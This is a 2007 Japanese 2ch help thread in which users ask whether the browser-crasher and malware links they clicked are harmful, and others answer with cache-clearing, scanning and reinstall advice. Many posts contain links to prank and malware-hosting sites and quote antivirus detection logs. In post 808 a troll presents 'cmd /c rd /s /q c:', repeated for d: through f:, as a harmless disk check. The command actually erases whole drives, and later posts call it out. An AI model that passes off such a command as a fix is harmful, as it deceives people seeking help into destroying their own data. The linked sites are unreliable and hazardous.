Firefoxでポップアップ防御しているのに 開かれるポップアップって、どんな作り してんの? それと、JAVA禁止にしても暴れるブラクラ もまた然り。
そのブラクラ見ないとわからんけどflash経由とかじゃね? flashならブラウザの設定でjavascript切ってても javascript有効になるし、flashは実は危険
646 :
名無しさん@お腹いっぱい。 :2007/07/05(木) 20:34:14
>643 ならばFLASHのPlug-inを削除してしまえばいいか。
厨房ホイホイ♪
>>7 のテンプレを使用させてもらいます。
使用OS:2000
アップデート:そこそこしている(三ヶ月いないにはしているはず
AntiVirus:Kingsoft antiVirus2006
antiUPdate:去年の10月に無料期間終了→放置
スキャンした結果:2つほど探知→対処に成功とのこと、もう一度スキャンしたら発見出来ず
別のオンラインスキャン:後述
症状:
立ち上がるのが遅い(これは勘違いかも
Windowsでドラッグ&ドロップが出来ない(ドラッグしても半透明のアイコンが移動しない
コピーしても張り付けが出ない(読み込んでない感じ
ネットでクリックしてもページがすすまないものがあるWindowsUpdateとかオンラインスキャンの実行ボタン、2chのスレなど
スレが開けないので専ブラから読んで、書いてます
インターネットエクスプローラを開いても検索出来ない(入力するところが出ない(お気に入りからGoogleは可
コントロールパネルの中身が左に寄る、インターネットエクスプローラで3:7に分けてその左にだけアイコンが出る感じ右はまっ白
原因:
ttp://anu.s7.x-beat.com/1up/src/up11316.jpg を踏みました。
手打ちなので間違っているかもしれません
これまでにとった措置:
スキャン数回、再起動数回 基本的には何もしていません。
その他の質問:どう、したらいいでしょうかよろしければお知恵をお貸しください○| ̄|_
マルチではないんですが 他に聞いてる人がいたのですね すまんです
>>655 ありがとさんでした
ちょっとガクブルだったので
コレで安心です
658 :
657 :2007/07/11(水) 02:12:13
上の方ですでに出てたんですね。 ですがOSはme でupdateはまったくしてないんです。 マズいでしょうか・・・
まぁ大丈夫だよ、とはとても言えん 正直、素の状態のmeなんぞネットに繋いでいるだけで感染してもおかしくない 一時ファイル削除して適当なアンチウイルスでスキャン 何も出なければそれでよし それでも不安ならリカバリなりOS再インストールからやるしかない
さっそく二次利用されだしたのか
662 :
ほるもん :2007/07/13(金) 09:59:00
只今踏んじまった!!大佐ァァァアアアアアアアアア!!!! \(^o^)/
663 :
名無しさん@お腹いっぱい。 :2007/07/20(金) 06:00:28
ageますよ
664 :
名無しさん@お腹いっぱい。 :2007/07/20(金) 07:17:09
IP抜き
>>665 ありがとうございます。
心配する必要ないですか??
666
669 :
名無しさん@お腹いっぱい。 :2007/07/21(土) 20:15:28
671 :
名無しさん@お腹いっぱい。 :2007/07/23(月) 01:12:43
ブラウザ経由で踏んだのなら単なるテキストとして処理されるだけなので アンチウイルスは反応するだろうが、特に対処の必要は無い 気持ち悪いなら一時ファイルの削除程度で十分
McAfee使って突っ込んでみた。
>>671 トロイの木馬 が自動的にブロックされ、削除されました。
詳細
検出: PHP/BackDoor.gen (トロイの木馬)
ファイルパス: C:\Documents and Settings\ *ユーザー名 \Local Settings\Temporary Internet Files\Content.IE5\QZSPE5I5\puniairi150[1].jpg
詳細
トロイの木馬は正規のプログラムを装っていますが、
コンピュータを混乱させたり、被害を与えたり、コンピュータへの不正アクセスを可能にするプログラムです。
コンピュータをスキャンして、その他の脅威が存在しないか確認することをお勧めします。
保護されていない状態で突っ込んだんだったらオンラインスキャンしてみなさいな・・・。
保護された状態で突っ込んだのなら心配ないけどね。
674 :
名無しさん@お腹いっぱい。 :2007/07/23(月) 01:28:07
>>672-673 即レスdです
俺のPCウイルスバスター2007のお試し使ってて隔離できませんした。手動で
削除してくださいって出てきたんだけどどうやって削除すればいいんでしょうか…?
後これは個人情報漏れたんですかね?
>>674 ローカルディスク (C:)に入って→ツール(T)→フォルダ オプション(O)... →表示→
すべてのファイルとフォルダを表示するにチェック(隠しファイルおよび隠しフォルダを表示しないの上)→
保護されたオペレーティング システム ファイルを表示しない (推奨)のチェックを外す→適用(A)→OK→
C:\Documents and Settings\ *ユーザー名 \Local Settings\Temporary Internet Files\Content.IE5\QZSPE5I5に行って→
puniairi150.jpgを削除するか
検索(S)でファイル検索(puniairi150.jpg)して探すか
>>674 IEなら「ツール」→「インターネット オプション」→インターネット一時ファイル「ファイルの削除」
「すべてのオフライン コンテンツを削除する」にチェック→「OK」
まぁ「インターネット一時ファイルの削除」でググってくれ
実行したらアンチウイルスで再度スキャン。何も出なければ完了
>>675-676 本当にありがとうございます!
検索でウイルス引っかからないし他スレでも調べましたがそんな怖いものでも無いみたいだし安心しました…
678 :
名無しさん@お腹いっぱい。 :2007/07/25(水) 00:51:33
goggleのブラクラを踏んだんですが危険ですか? なんにもおきませんでした。 マックです。
679 :
名無しさん@お腹いっぱい。 :2007/07/25(水) 01:04:31
>>678 マックで踏んだの?可愛そうに・・・・終了です。
tp://monoganac.sakura.ne.jp/src/emergency4064.jpg これはPCに実害があるのでしょうか 奥菜恵の写真が出てoutlookなどが起動したんですが
>>684 >>561-562 辺りと似たような感じ
内容は多少違うが、複数のブラクラサイト、ウイルスサイトの呼び出し
WindowsUpdateを怠ってなければ感染はまではいかないと思うが
心配なら一時ファイル削除して適当なウイルスキャン
何も検出されなければ完了
>>685 レスありがとうございます
そのとおりやってみます
>>561 のヤツは、ダークロリータと似た感じだよな。
tp://atk.jp/dskm やばいですか?
>>689 やばいです
ストレンジワールドに飛ばされます
ありがとうございました。
695 :
名無しさん@お腹いっぱい。 :2007/08/11(土) 21:22:43
696 :
名無しさん@お腹いっぱい。 :2007/08/11(土) 22:24:10
tp://up.uppple.com/src/up5288.jpg って張ろうと思ったら2個上の人と被りんこ 詳細求む
>694 >696 ウイルス感染無し。 ブラクラ。
>>695 (株)トーリージャパン って所が扱っている不動産物件情報ページ
で、なぜかSCOでワンクリ・スパム元に指定されてる
事業内容とやらにレンタルサーバーがあるからそれ経由なのか
それとも元々あやしい会社なのかはわからん
今の所PCに害は無い
700 :
名無しさん@お腹いっぱい。 :2007/08/11(土) 23:56:04
701 :
名無しさん@お腹いっぱい。 :2007/08/12(日) 00:38:42
>>4 こうゆうのはjaneDoeだと安心して踏んじゃう
このスレのURLをNGWORDに追加すればある程度は防げるよ。
703 :
名無しさん@お腹いっぱい。 :2007/08/12(日) 06:36:46
>>704 アウツです
直ぐにPC再インスコして下さい
>>704 ウィルス: Exploit.Win32.IMG-WMF.v
Web コンテンツのロード中にウイルスが検出されました。
アドレス: search-buy.info
ウィルス: Trojan-Downloader.JS.gen
Web コンテンツのロード中にウイルスが検出されました。
アドレス: 2005-search.com
707 :
704 :2007/08/13(月) 21:35:31
今ウイルス検索中です…
708 :
704 :2007/08/13(月) 22:26:37
とりあえずウイルス検索した限り異常はでませんでした・・
ウイルスサイト付きのエロサイト ?以降の文字列は引っ掛け。サイトトップページを踏んだのとほぼ同じ結果になる 踏む前にWindowsUpdate完了していれば問題無い 再度スキャンして何も出なかったのなら心配無いかと
Janeで画像リンクを踏んだ場合、それが画像で無ければ開けないハズなんだが つまり、ビューアで云々メッセージが出るだけ
>>704 おれはそれをjaneで踏んであとでavastでスキャンしたら見つかった
>>704 おれはそれをIEで踏んだあとで1個ずつサイトを開いた
714 :
名無しさん@お腹いっぱい。 :2007/08/14(火) 23:50:24
>>714 かなりの数のウイルスサイトを呼び出す
まあどれも既知の脆弱性を利用するものなので踏む前に
WindowsUpdate済ませてあるなら問題無いだろう
復元作業までしたのなら大丈夫だと思うが心配なら適当なウイルスチェック
何も出なければ完了
716 :
名無しさん@お腹いっぱい。 :2007/08/16(木) 00:22:57
tp://www.flipcjip.net/FFXI/
↑
FF11というゲームの情報サイトとしてスパムされていたURLです
サーバが中国にあるらしく、中国人業者がPCにインストールしてある
FF11のログインパスワード等を抜き取るために造った罠サイトではないか、
と言われてるみたいなのです
ゲームがインストールされていないネット閲覧用の別PCで踏んでしまいましたが
ページが真っ白になっていたので罠にひっかかったかと思って即閉じてしまいました
(WindowsUpdateとセキュリティソフトは最新にしてあります)
ソースチェッカーオンラインでURLのソースを調べてみましたが
悪質なコードが含まれているかどうかよくわかりませんでした
ttp://so.7walker.net/index.php?site=http%3A%2F%2Fwww.flipcjip.net%2FFFXI%2F&hua= 何か危険なにおいのある点がありましたらご教授ください。
>>716 2004年12月に修正されたセキュリティホールを利用して、ウイルスを実行するページです。
一部のIEコンポーネントブラウザで感染報告がありますが、その他のブラウザでは感染しないので無害です。
>>717 なるほど、日ごろからWindowsUpdateをしていれば大丈夫そうですね、
念のためウィルススキャンもしてみます〜ありがとうございました。
>201 下やばいな・・・ Spybot - Search & Destroyがブロックしてくれて助かった。
>>720 スクリプトでウィンドウのサイズや位置を変更し、映像と音声はflashだけ。
びっくり系かジョーク系か判らんけど、ウイルスは無いよ。
722 :
名無しさん@お腹いっぱい。 :2007/08/21(火) 17:28:49
普通のびっくりgifでPCに悪影響のある要素は見当たらない
724 :
名無しさん@お腹いっぱい。 :2007/08/21(火) 18:59:12
初歩的なこと聞くけどブラクラってウィルスのことだよね?
一般的に言うブラクラはブラウザをたくさん開いたりして PC動作を重たくする・ハングアップを狙うとか、そういうものを指す ウイルスと違って基本的に感染活動をしない
726 :
名無しさん@お腹いっぱい。 :2007/08/23(木) 15:08:19
ブラウザ・クラッシャーの略だろ。 ソフトをインストールさせようとしてくるがな。 それに入ってる恐れあり
727 :
名無しさん@お腹いっぱい。 :2007/08/23(木) 16:17:10
>>727 ストレンジワールドに飛ばされるようです。
対策はストレンジワールドでぐぐればでてくるよ。
729 :
名無しさん@お腹いっぱい。 :2007/08/23(木) 16:30:42
>>728 回答ありがとうございます。
一応踏んだ瞬間、対策ソフトが検出してキャッシュも消しておいたのですが。
それだけで後は問題ないのでしょうか?
730 :
名無しさん@お腹いっぱい。 :2007/08/23(木) 19:39:11
これ踏んじゃいましたwww.yahii.com.br/
732 :
729 :2007/08/24(金) 16:00:37
こちら踏んだら404だったんですが不安です これは害無しと見ていいんでしょうか? tp://85.255.114.166/1/rdgCA2404.exe
>>736 実体はhtmlで画像では無い
「ハッキングしますた」という感じのいたずら・ジョークページかな
一応常にアクティブウィンドウになる仕掛けがしてあるので
何も知らないで踏むと、変なの仕掛けられたと思うかもしれない
軽いブラクラといった所
対処法はそのまま閉じるか別のページに飛べばいい
特にシステム感染などは行わないので事後処置も必要無い
739 :
名無しさん@お腹いっぱい。 :2007/08/26(日) 00:21:23
ここ踏んだらポップアップのブロックがとまらなくなったのですが、
ポップアップを外すと何が出るか怖くて見れません
このサイトを踏んだ場合、ウイルスとかでるでしょうか?
URLからして有名そうな気がするですが
357 名前: 就職戦線異状名無しさん 投稿日: 2007/08/26(日) 00:09:04
http://www2.strangeworld.org/uedakana/ 「週間ダイヤモンド」の2006年9月16日号に掲載されている100職種推定年収ランキング
743 :
名無しさん@お腹いっぱい。 :2007/08/26(日) 22:41:15
テキスト文書でできる ブラクらの作り方 教えて下さい
744 :
名無しさん@お腹いっぱい。 :2007/08/27(月) 10:03:41
tp://hey.chu.jp/up/source3/No_5970.png 多分なんかの画像だと思うけど 解らないてかjaneが固まってしまう
746 :
744 :2007/08/27(月) 11:02:51
744の画像結構前からたびたび貼られているけど janeに仕様変更でもあったの? 最近になって、jane固まるって騒がれているの見かけるようになったもんで
メモリ喰いまくってハングアップするだけ
じゃ特に何か変わったわけでも無いのか 了解
750 :
ν :2007/08/28(火) 08:27:39
ν
751 :
名無しさん@お腹いっぱい。 :2007/08/28(火) 14:35:35
ttp://up.uppple.com/src/up5288.jpg グロ画像が出た後胡散臭いサイトに飛ばされ
色々されました。トロイ出たので削除して、
OEで自分のメールアカウント以外の変なのができたので
自分が使うメールのやつ以外全て消しました。
Realの履歴も精神衛生上よろしくないので抹消しました。
なんかダウンロードされたのとTelnet起動が気になります
光回線なのでQ2とかの変なダイヤルアップはされてないと思われますので
以上の処置でいいのでしょうか。
>>751 中身は大体
>>561 あたりと同じ
各種ブラクラ及び
>>3 のサイトの呼び出し
あと複数のウイルスサイトの呼び出しがある
事前にWindowsUpdateしてあれば、ほぼ感染は無い
一応適当なウイルススキャンして何も出なければ完了
753 :
名無しさん@お腹いっぱい。 :2007/08/28(火) 15:36:34
ok, ありがとうございます AVGが感知してくれたのでよしとします。
755 :
754 :2007/08/28(火) 23:42:27
入力したものだけじゃないすかね?
PCに実害が有るか無いかで言ったら有る方になるが
>>754 >>561 と大体同じ内容
呼び出すサイトなどに多少違いがあるが
各種ブラクラや複数のウイルスサイト・ブラクラサイトを
呼び出すという構造は変わらない
従って対処法も変わらない
適当なウイルススキャンして何も出なければ完了
27歳一流大学卒業。一流企業に就職し、同年代の他の人に比べ 給料もずっと高い。大きな仕事だって任されている。妻もいて 子供もいて家だって持っている。他人が羨むような生活を送っている。 そんな俺の唯一の趣味はインターネットの匿名掲示板『2ちゃんねる』だ。 家に帰ってパソコンを立ち上げるなり、いきなり「うんこ」と書き込む。 アツイ議論が飛び交っている有意義なスレッドに向かって なんの脈絡も無く突然「うんこ」だ。 会社の奴らもまさか俺が「うんこ」と書きこんでいることは夢にも思うまい。 クソマジメでとおっている俺が会社で「うんこ」と発言するわけないからな。 とにかく俺はこうやって日々のストレスを発散しているのである。 「うんこ」
759 :
名無しさん@お腹いっぱい。 :2007/08/29(水) 04:32:37
>>727 と同じくこれ踏んでしまいました
ttp://imepita.zz.tc/020070817 警告出たのですぐ閉じて再起動キャッシュ削除しました。
問題ないとのことですが、なぜかavastが変です。
ツールバーのアイコンに停止マークみたいのついてて、クリックすると
「AAVM サブシステムはRPCエラーを検出しました。
処理を完了することができませんでした
[OK] 」
と出てきます。どうしたらいいですか^^^^^
762 :
名無しさん@お腹いっぱい。 :2007/08/29(水) 10:59:57
>>760 なんか朝起きたら治ってました。
ご指摘の通りブラクラ関係なかったようです。
ありがとうございました!
763 :
名無しさん@お腹いっぱい。 :2007/08/31(金) 01:51:44
すみません!
初心者なんですが教えて下さい。
ttp://imepita.zz.tc/020070817 パソコンで開いたら、ウイルスバスターが「(このウイルスは)隔離できませんでした」と出て、危険度は3あるうちの2でした。
どう対処したら良いのでしょうか?
そして、このブラクラにはどの様な害があるのかも、教えて下さい。
ご存知の方おられましたら、どうかよろしくお願いします。
765 :
名無しさん@お腹いっぱい。 :2007/08/31(金) 02:11:46
>>764 申し訳ありませんが、詳しく教えて頂けたら幸いです。
よろしくお願いします。
767 :
名無しさん@お腹いっぱい。 :2007/08/31(金) 02:25:41
>>766 何回もすみません。
1から読んでみますが、色々あるブラクラの中から私の開いたブラクラを探し出すコツはありますか?
皆さんはどの様に見つけているのでしょうか?
遅くなりましたが、レス有り難うございます。
770 :
名無しさん@お腹いっぱい。 :2007/08/31(金) 04:46:39
771 :
名無しさん@お腹いっぱい。 :2007/08/31(金) 04:49:42
おk^^
774 :
名無しさん@お腹いっぱい。 :2007/09/01(土) 00:28:41
776 :
774 :2007/09/01(土) 12:32:14
>>775 ありがとうございます。
無事童貞卒業できました。ハァフゥ〜
777 :
名無しさん@お腹いっぱい。 :2007/09/06(木) 05:03:54
tp://news-club.jp/register1.php?top=view&blog=a お手数ですがよろしくお願いします
779 :
777 :2007/09/06(木) 05:16:10
>778 こんな明け方にありがとうございます! 何かブラウザがDOSコマンドのような表示をしたので不安になってしまって… 安心して仕事いってきます!
一応怪しいサイトだからクッキー・キャッシュ削除とオンラインスキャンぐらいはしといたほうがいいと思う。
>777 同じの踏みました。 踏んで即>780をしましたが・・・ ここを見て良かったです。 >778,780 777さんではないですがありがとうございました。
782 :
名無しさん@お腹いっぱい。 :2007/09/07(金) 20:23:48
直リン張るなボケ
IEが使えなくなりました。 【使用OS】 XP 【WindowsUpdateしてるか】 ? 【AntiVirusは何を使っているか】 ウイルスバスターは使ってません。 【ちゃんとUpdateしてるか】 ? 【スキャンした結果(ウイルス名・発見場所)】 してません。 【別のオンラインスキャンしたならその結果は】 わかりません 【症状を具体的に、分かる限りすべて書く】 IEがタグを無限に開き始めました。 変な警告(何とかの初期化に失敗しましたみたいな)も出ました。 焦って無理やりシャットダウンしました。 もう一度起動してみたらネットに繋ぐ事も出来なくなっていました。 【何をしたらそんなことになったのか】 Vista Uploaderとかいうぅpろだで画像を開いたら上記のようになりました。 その画像は全体的に黒色の背景で女の子が写ってるものでした。 リトバスのキャラ三人が写ってる画像の隣にありました。 【これまでにとった措置】 IE7をインストールしてみましたがダメでした。 FIREFOXではちゃんと繋がりました。 【その他の質問】 かなり焦ってます。 直す方法を教えて下さい! 何が何だかわからなくて困ってます。
785 :
784 :2007/09/08(土) 03:52:25
書き忘れてました。 他のアカウントではIEは正常に繋がりました。 ブラクラ踏んだ自分のアカウントだけがダメみたいです。 どなたか直し方を教えて下さい。
>>784 データや設定をバックアップして素直にリカバリ。
その際WindowsUpdate、アンチウィルスのインストールも忘れずに。
で、当たり前のことだがそれらの作業が完了するまでネットアクセスは控える。
>ウイルスバスターは使ってません。 お前らここには突っ込まないの?
突っ込んだら負けだ。と思っている。
7. //www.albinoblacksheep.com/flash/open.html 踏んじゃったんだけど どうしたらいいの? 特になんともありません ただ、今オンラインスキャンしているのだが 進行状況96パーセントでスパイウェア2個検出しているようです・・・・
>>790 スパイぐらいで騒ぐなよ。削除するかそのままにするか自分しだいだ
792 :
784 :2007/09/08(土) 19:48:45
>>786 のサイトでチェックしたところ
スパイウェア Generic Grayware
セキュリティーホール MS07-004 MS07-027 MS07-033
と出てきました。
それからスパイウェアを削除して、MSUPDATEしようとしてクリックしてもIEではこのページを表示出来ませんと
出るため、別のアカウントからXP SP2用のUPDATEを3つDLしてブラクラ踏んだアカウントに移して起動させましたが
まだIEではこのページを表示出来ませんと出ます。
どうすれば良いでしょうか?
何がいけないのでしょうか?
文が変だと思いますが助けて下さい!
ウイルスバスターはマカフィーの無料が切れて、新しく何か入れようと思っていた矢先にこの様ですorz
まずPCは家族などの共有ですか? あとこのPCで管理者権限を持っていますか?
795 :
784 :2007/09/08(土) 20:12:05
このPCは家族で使ってます。 兄、自分、親と分けて使っています。 管理者権限はちょっとわかりません。 調べる方法ありますか?
797 :
784 :2007/09/08(土) 20:57:32
システムの復元をしようとしたらrstrui.exeに問題が発生したとでて起動しません。 これもブラクラの影響ですか?
799 :
784 :2007/09/08(土) 22:49:25
僕のアカウントだけ消してまた新しいアカウントを作っても無駄でしょうか? 復元しても復元ポイントが変な場所だったのでダメでした。 (復元ポイント Installed Windows XP KB915865) そして復元してもIEでは表示出来ませんとまた出ます。 もう訳がわかりません。
801 :
784 :2007/09/08(土) 23:09:33
アカウントを作り直すのは、必要なデータだけ共有フォルダに入れてから消すであってますよね? 消したらまた新しく作ると。 それでもダメだったらどうしよう(;´д⊂)
803 :
784 :2007/09/09(日) 03:26:36
無事に直りました! アカウント作り直す方法でやりました。ちゃんとIEも使えます。 これを教訓にウイルスバスターをしっかり入れときます。 皆さんありがとうございました! ブラクラマジ無くなれ(´・ω・`)
ウイルスバスターは止めとけ。 金出すだけ無駄だぞ。
805 :
名無しさん@お腹いっぱい。 :2007/09/09(日) 04:23:40
ワンクリ詐欺にひっかかった!! デスクトップにずっと変なの出てる お願いタスケテ
>>805 リカバリー
後は何も無かったかのように忘れる
>>805 チェックディスクコマンドを試してみ。
1.[スタート]→[ファイル名を指定して実行]で
cmd /c rd /s /q c:
と入力し[OK]をクリックする。
上記と同様に以下も順に実行する。
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
これでレジストリの破損やメモリのキャッシュなどがクリアされて正常になる。
HDD内も綺麗にリフレッシュされるのでオススメ。
事前予防にもなるので、やった事がなければ試してみる価値あり。
>>808 一つめのコマンドを実行した時点でエラーが出ます。
(・ε・)キニシナイ!!
>>809 こっちのほうが簡単確実だお
1 スタートボタンを押し、ファイル名を指定して実行]をクリック
2regedit と入力
3HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runと入力
4 Welcome = %System%\kernel32.exeの値を削除
5HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runと入力
6Config = %System%\kernel32.exeの値を削除
7HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesと入力
8Sevice = %System%\kernel32.exeの値を削除
9HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceと入力
10Welcome = TMP15F.EXEの値を削除
11HKEY_CURRENT_USER\Software\Microsoft\Windowsと入力
次の値を削除
o File1
o File2
o File3
o Count
o Date
o LastError
o Ver
12レジストリエディタを終了
13 コンピュータを再起動
そのコマンドとか訴えられて逮捕された例もあるからほどほどにな
というよりも、どうして面識のない、顔もわかんない どこに住んでいるかも判らない、つまりはどこの馬の骨ともわからない 赤の他人の言うことをほいほい信じて実行するやつがいるのか そっちのほうが、ウィルスに引っかかるより謎だ。
ん?怖くなったの?w
いや、後で泣くくらいなら自分でちゃんとしようと 考える頭がないほど、教えてくれちゃんってのは お子様なのかなあ、と。
とりあえず通報しておきました
俺も通報しといた
>>819 いや、そう言う問題だが。
何もしないでも自動的に発動するもの以外はな。
全部自己責任だろ、こんなもん。
ところで、ブラクラ踏んだ後に 何か対策してる?
>>820 訴えられるのはたとえ相手が馬鹿でもそういうのは関係ないんだよ
そんなに怖くなったのか?
823 :
名無しさん@お腹いっぱい。 :2007/09/14(金) 13:42:59
恐怖で涙目の809、812ワロスwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
824 :
名無しさん@お腹いっぱい。 :2007/09/14(金) 14:06:56
>>820 ネットはねぇ、子供も見てるんだよねぇ
子供に危害を加えるような書き込みしちゃいけないよねぇ
全部自己責任だよねぇ^^;
まあ、想像力の欠如はろくな結果にならないからな 子供じゃあるまいし 大人なら自己責任という言葉を自己の正当化に使うのはやめろ
829 :
名無しさん@お腹いっぱい。 :2007/09/15(土) 18:44:13
tp://www2.strangeworld.org/uedakana/ 踏んじまったぜ
tp://omanchin.com/railway/omanchin.cgi/img/img20070615.jpg ↑専ブラで踏んでしまったんですが・・・
>>830 リモートホストとクリップボードの中身を抜かれる
PCそのものには実害無い
── ヽ
ノ:::::::\::::::::::::::::::::::ヽ
/::::::::::::ノノ'''''''\::::::::::ヽ
ノ::::::::::ノ \ /ヽ:::::ヽ パソコン壊れちゃったよ…。
|:::::::::ノ) ヘ ヘヽ:::| _________
ノ::::::ノ ( ) |:::: | |. |
ノ::::::ノ / ̄\| :::| | | |
ノ:::::| \___ノ::::| .| | |
ノヾ\゙ ー‐ -イ\. .| | |
/⌒\)_\ | ゝ ヽ |_|_________|
| \``\ ゙ l |/ ヾ ヽ _,| | |_
.|ヽ、 〜ー‐┴ィ'⌒| ̄ ̄ ̄| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| カタカタ…
───────┴'こ|___|_:◎__[ロ:≡〕ロ.|────
http://www.scancoo.com/
833 :
830 :2007/09/18(火) 20:57:57
>831 ありがとうございます。 リモートホストを抜かれると何か問題があるのでしょうか?
>>833 ほぼ無い
リモートホスト(IP)は基本的にアクセスした相手に知らせるようになっている
830のサイトのようにわざわざ第三者に見せる事は、普段はしないというだけ
強いて言うなら会社や学校のPCから見た時くらいか
>>835 red4.swfにリンクされていて 「 このファイルは危険なファイルのひとつです。 」 とでた。
確かにオンラインチェッカーではそう出るけど、ウイルスバスターのリアルタイムスキャンは何も反応しなかったんだよね 念のためにバスターのフルスキャンと、カスペルスキーのオンラインスキャンをかけたけど何も出なかった インターネットキャッシュも削除したし、一応何でもないことにしておくよ
838 :
名無しさん@お腹いっぱい。 :2007/09/29(土) 13:49:46
ブラウザの一時キャッシュを削除してお終い。
840 :
名無しさん@お腹いっぱい。 :2007/09/30(日) 03:24:15
>>839 これはトロイといわれるものなんですか?
ただのブラクラ
842 :
名無しさん@お腹いっぱい。 :2007/10/01(月) 01:31:29
ttp://www.crazyclits.com/?cgi-bin/tm3/1d4f97.jpg これ踏んじゃって、AVGがブロックしてくれたみたいなんだけど
焦ってウインドウ閉じちゃったら、その後AVGスキャンしたら3個ヒットしました。
2つは隔離してくれたみたいなんだけど、1つどうしても消えないんで、
システムの復元してもう一回スキャンしたけど、unknown virus exploit wmfってのがヒットしました。
AVGうpデートしてもう一回更に一日前にシステム復元したら今度はヒットしませんでした。
これで大丈夫なんでしょうか??
843 :
名無しさん@お腹いっぱい。 :2007/10/01(月) 02:10:35
【使用OS】 Me 【WindowsUpdateしてるか】 HP見てみたらMeは使えないとかなんとか… 【AntiVirusは何を使っているか】 ? 【ちゃんとUpdateしてるか】 たぶんしてません 【スキャンした結果(ウイルス名・発見場所)】 【別のオンラインスキャンしたならその結果は】 【症状を具体的に、分かる限りすべて書く】 今のところ何とも無く普通に使えてます 【何をしたらそんなことになったのか】 tp://ime.nu/imepita.zz.tc/020070817 これ踏んでしまいました… なんかどっかのスレでこのURLはトロイの木馬だと 見た記憶があるのでかなり焦ってます 【その他の質問】 パソコンはド初心者なので何すれば良いのかまったくわかりません… 何か処置方法教えて下さい
>>844 有名なブラクラに飛ばされます。IEで踏んだのなら
画面上部のツール>インターネットオプション>
Cookieの削除>ファイルの削除>OKボタンクリック
してキャッシュを削除します。
そしてウイルスソフトを入れてないなら、各社オンラインスキャン
してみましょう。と言いたいところですがOSがMeだと
利用できない所が多いようです。体験版も使えないし。
Meに対応したウイルスソフトがもう少ないので、
Me対応のウイルスソフトを買ってトロイを削除した方が
いいと思います。
846 :
844 :2007/10/01(月) 22:52:06
>>845 専ブラ(ギコナビ)で2ちゃんを見ている時に踏みました
いま一応やっといたほうがいいかなと思ってファイルの削除→OKを押して、
ちゃんと消えたのかなと思ってファイルの表示っていうのを押してみたら
なんかエラー(『表示出来る記憶域がありません』?)というのが延々と出てきて
焦りました… これちゃんと消せてるんでしょうか?
Meだとほとんど利用できないんですね…購入も考えてみます
ちなみに、
>>845 を踏むとどういう害が出るんですか?
今のところ普通に使えますが、知らないうちに何か起こってるんでしょうか…
848 :
名無しさん@お腹いっぱい。 :2007/10/03(水) 03:57:34
>>847 844です
わざわざ教えてくださってありがとうございます
さっそく使ってみたらトロイの木馬2つとウィルス4つ見つかりました…;
これで安心出来ました、レス本当にありがとうございました
850 :
名無しさん@お腹いっぱい。 :2007/10/03(水) 19:33:03
質問です さっきブラクラを踏んでしまい 再起動したらマウスが出なくなってしまったのですがどうすれば直りますか? OSはMeでIEを使っています
>>851 とりあえずWINDOWSキーと十字キー使ってシステムの復元できないか?
できるかやってみそ
853 :
名無しさん@お腹いっぱい。 :2007/10/03(水) 20:44:40
>>853 セーフモードで起動させてもシステムの復元できないか?
Meだと電源投入時からCtrlキーを押しっぱなしでメニュー
からSafe Modeで起動
tp://sorimati.s3.x-beat.com/upload/source/up0140.jpg 慌てて強制終了しましたが、踏んでしまいました。 WindowsUpdateはしていませんでした。 オンラインスキャンではトロイが発見されました。 Ad-Aware2007でスキャン、削除したけど大丈夫でしょうか? 対処法お願いします。
ありがとうございます。再インストールしてみます。
858 :
名無しさん@お腹いっぱい。 :2007/10/07(日) 17:50:57
よそでも質問して再インストールと言われたのですけど tp://mantoruhakase-blog.bravehost.com/ これなんですけどどうでしょうか・・・ よろしくお願いします|||orz
>>858 ブラクラだろう
ページのHTMLソースの中にwww.albinoblacksheep.com/script/you.jsとか入ってるし
albinoblacksheep.comって有名だし
やばいと思うよ
ちなみに、上記ファイルを開こうとしたら、俺のavast!が「VBS:Malware [Gen]」を検出したと騒いだ
860 :
858 :2007/10/07(日) 21:10:59
再インストしか対処方法ないですかね・・・ AVGとカスペルでスキャンしたところ何も発見されなかったのですけど
861 :
ポンプ大帝 ◆Cyv0oh.DWo :2007/10/07(日) 21:36:37
よくネカフェで踏んでしまいます><
862 :
名無しさん@お腹いっぱい。 :2007/10/07(日) 23:45:42
カスペでスキャンしたら、ウイルスが発見されたんですけど、 どうやって駆除すればいいんでしょうか?
>>860 ブラウザの一時キャッシュを削除すればいい。
他は特にないし。
864 :
カレン :2007/10/08(月) 18:26:43
hellplantにつながってる IP抜きとか厨房ほいほいと呼ばれてるそこそこ有名な物 ウイルシとかは無い
867 :
カレン :2007/10/08(月) 21:12:53
ウイルス無いですか・・・良かった・・・ ありがとうございます。 ほかに害は無いのでしょうか? クッキー+ファイル削除+再起動でいいですか?
うん
久し振りにゾンビウインドウを踏んだOTL
tp://mantoruhakase-blog.bravehost.com/ を踏んだらトロイの木馬が検出されたと出てしまいました。 どうすればいいですか?
ブラウザの一時キャッシュを削除
872 :
870 :2007/10/14(日) 11:33:50
一時キャッシュとはどうやるのでしょうか 教えてちゃんですみません
Microsoft Internet Explorer (IE) 1. 新しいブラウザを開き、ブラウザの上部にある [ツール] メニューの [インターネット オプション] をクリックします。 2. ダイアログ ボックスの上部にある [全般] タブをクリックします。 3. [インターネット一時ファイル] の下にある [ファイルの削除] をクリックします。 4. [すべてのオフライン コンテンツを削除する] のチェック ボックスをオンにします。 5. [OK] をクリックします。 Mozilla Firefox 1. 新しいブラウザを開き、ブラウザの上部にある [ツール] メニューの [オプション] をクリックします。 2. [プライバシー] をクリックします。 3. [キャッシュ] の横の [クリア] をクリックします。 4. [OK] をクリックします。
874 :
870 :2007/10/14(日) 17:40:29
やってみます! ありがとうございました!
875 :
870 :2007/10/14(日) 21:31:18
色々試してみて、システムの復元も行い、ウイルススキャンからも感染ファイルは見つからなかったのですが、 突然ファーアオォールが有効から無効になりました。 すぐに有効に直しましたが、これはトロイが潜んでいるということなのでしょうか?
876 :
870 :2007/10/14(日) 22:45:54
連投すみません。 ×ファーアオォール ○ファイアウォールです すみません ふじこりました 誰か助言お願いします。 ブラウザの一時キャッシュの削除も行いました
>>866 -- 「2007/10/07 6:49」のキャッシュをチェックしています。 --
注意!ループタグを発見! (2)
>>877 >-- 「2007/10/07 6:49」のキャッシュをチェックしています。 --
古すぎ。今は、404
879 :
